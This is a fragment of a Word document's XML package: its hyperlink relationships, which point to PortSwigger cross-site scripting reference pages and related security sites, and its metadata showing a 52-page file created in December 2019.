Target="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://help.dottoro.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/contexts" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/exploiting" TargetMode="External"/><Relationship Id="rId29"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hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/contexts" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/garethheyes/status/997466212190781445" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/stored" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/garethheyes" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ha.ckers.org/xsscalc.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/reflected" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/dom-bas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swigger.net/web-security/cross-site-scripting/reflected" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/stored" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/vulnerability-scanner" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.ietf.org/html/rfc23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52</Pages>
  <Words>12596</Words>
  <Characters>71799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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-20T18:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-20T18:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>